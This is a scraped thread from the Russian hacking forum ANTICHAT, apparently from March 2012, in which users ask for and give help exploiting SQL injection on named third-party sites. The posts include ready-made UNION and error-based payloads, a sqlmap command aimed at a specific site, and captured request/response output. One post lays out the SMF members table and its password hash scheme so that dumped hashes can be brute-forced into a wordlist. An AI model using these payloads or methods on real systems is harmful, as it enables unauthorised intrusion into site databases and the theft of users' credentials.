ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2012, 17:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
mix0x0,
у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
|
|
|
|
13.03.2012, 20:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
в какой таблице находится логин и пароль от форума SMF?
а то найти не могу(
все, было найдено. Просто в 200 таблицах потерялся)
кто не знает - это smf_members
|
|
|
|
13.03.2012, 21:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Сообщение от xcedz
xcedz said:
awk, grep
Спасибо за наводку, будем гуглить.
Сообщение от Ereee
Ereee said:
mix0x0
,
у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
, шелла нету, только дамп бд.
Нужно спарсить логины, хэши (+salt) для брута, в дальнейшем использовать как словарь.
|
|
|
|
13.03.2012, 22:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от xcedz
xcedz said:
Во первых есть поиск в мускуль базу
Во вторых смф имеет открытые исходники
В третьих
SMF (SMF 1.1.x.): sha1($$username.$$pass)
/Sources/Admin.php
smf_members
id_member
id_group
member_name
passwd
password_salt
email_address
ICQ
AIM
member_ip
member_ip2
secret_question
secret_answer
http://dbitems.wen.ru/
В четвертыx новый адрес сайта http://dbitems.ru
|
|
|
|
13.03.2012, 22:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Помогите скулю разкрутитть плыз
тут
http://zapoved.ru/?act=docs_more&id=3
тут
http://nir.msu.mogilev.by/?mod=resource&id=31
и тут
http://www.mgpu.ru/download.php?id=11048
|
|
|
|
13.03.2012, 23:01
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
Сообщение от faza02
faza02 said:
Faaax
=\
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit
+
1,1)
так видно?
исходя из данных каторих ты дал, можно перебирать с помощью WHERE если есть по чему перебирать типа колонка (id) или попробовать вариант с акумуляцею данных в переменную
Код:
Code:
union(select(1),2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,(6))
https://rdot.org/forum/showthread.php?t=1170 -- для изучения
|
|
|
13.03.2012, 23:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от xcedz
xcedz said:
1
sqlmap.py -u "http://zapoved.ru/?act=docs_more&id=3" -p "id" --random-agent --technique=EU --dbms=mysql -v 3
Код:
Code:
Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: act=docs_more&id=3') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7174643a,0x4b686a6b476d6f6d504f,0x3a7172763a)# AND ('DzDB'='DzDB Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, [QUERY]#
2
Код:
Code:
Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: mod=resource&id=31 AND (SELECT 4325 FROM(SELECT COUNT(*),CONCAT(0x3a7361633a,(SELECT (CASE WHEN (4325=4325) THEN 1 ELSE 0 END)),0x3a6f62653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ---
3
субд Firebird хз над поковырять а чего не получается ничего вывести?
http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1 ,table_name,3,4,5,6,7+from+information_schema.tabl es+limit+0,1+and+%28%27DzDB%27=%27DzDB
|
|
|
|
13.03.2012, 23:25
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
вопрос мой исчерпан, спасибо Cybersteger, так же к прочтению всплыло https://rdot.org/forum/showthread.php?t=1243
|
|
|
|
13.03.2012, 23:34
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
Ребят,помогите продвинуться в раскрутке скули
http://www.single-russian-woman.com...0&show=0&sorting=-1bvn5&weight1=1&weight2=210
уязвимость в параметре sorting,вроде...ошибка в HTTP-заголовке
Код:
Code:
http://www.single-russian-woman.com/cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210
GET /cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210 HTTP/1.1
Host: www.single-russian-woman.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: adv=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dsingle%2520russian%2520women%26source%3Dweb%26cd%3D1%26ved%3D0CHUQFjAA%26url%3Dhttp%253A%252F%252Fwww.single-russian-woman.com%252F%26ei%3DZlFeT4PlJc_V4QSqkL3iDw%26usg%3DAFQjCNEj3xkfJiBZvycDvWk08byKTKFdZg; seeking=0; country=; age1=19; age2=100; height1=100; height2=250; weight1=1; weight2=210; sorting=15; lang=; langlevel=; eyecolor=; haircolor=; activerest=; genrefilms=; favmusic=; zodiac=; smoking=; drinking=; children=; keyword=; name=; maritalstatus=; russian=; photost=0; session=n2aojhfg57vb0xpim5kpgc1147925
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Tue, 13 Mar 2012 19:20:30 GMT
Server: Apache/2.2.3 (CentOS)
DBD: :mysql::st execute failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 0, 12' at line 1 at search.cgi line 1285., :mysql::st fetchrow failed: fetch() without execute() at search.cgi line 1286.
Set-Cookie: seeking=0; path=/
Set-Cookie: country=; path=/
Set-Cookie: age1=19; path=/
Set-Cookie: age2=100; path=/
Set-Cookie: height1=100; path=/
Set-Cookie: height2=250; path=/
Set-Cookie: weight1=1; path=/
Set-Cookie: weight2=210; path=/
Set-Cookie: sorting=15; path=/
Set-Cookie: lang=; path=/
Set-Cookie: langlevel=; path=/
Set-Cookie: eyecolor=; path=/
Set-Cookie: haircolor=; path=/
Set-Cookie: activerest=; path=/
Set-Cookie: genrefilms=; path=/
Set-Cookie: favmusic=; path=/
Set-Cookie: zodiac=; path=/
Set-Cookie: smoking=; path=/
Set-Cookie: drinking=; path=/
Set-Cookie: children=; path=/
Set-Cookie: keyword=; path=/
Set-Cookie: name=; path=/
Set-Cookie: maritalstatus=; path=/
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
----------------------------------------------------------
также на соседском сайте джумла стоит...на нем из паблик exploitov один ток подошёл вроде..( http://seclists.org/bugtraq/2011/Apr/80 )
тоже вроде скуля,но продвинуться мне там не получилось...
http://www.stopsmoking4steps.com/ind..._jce&Itemid=-1
подсобите,пожалуйста,в какую сторону копать |
|
|
|
14.03.2012, 00:45
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
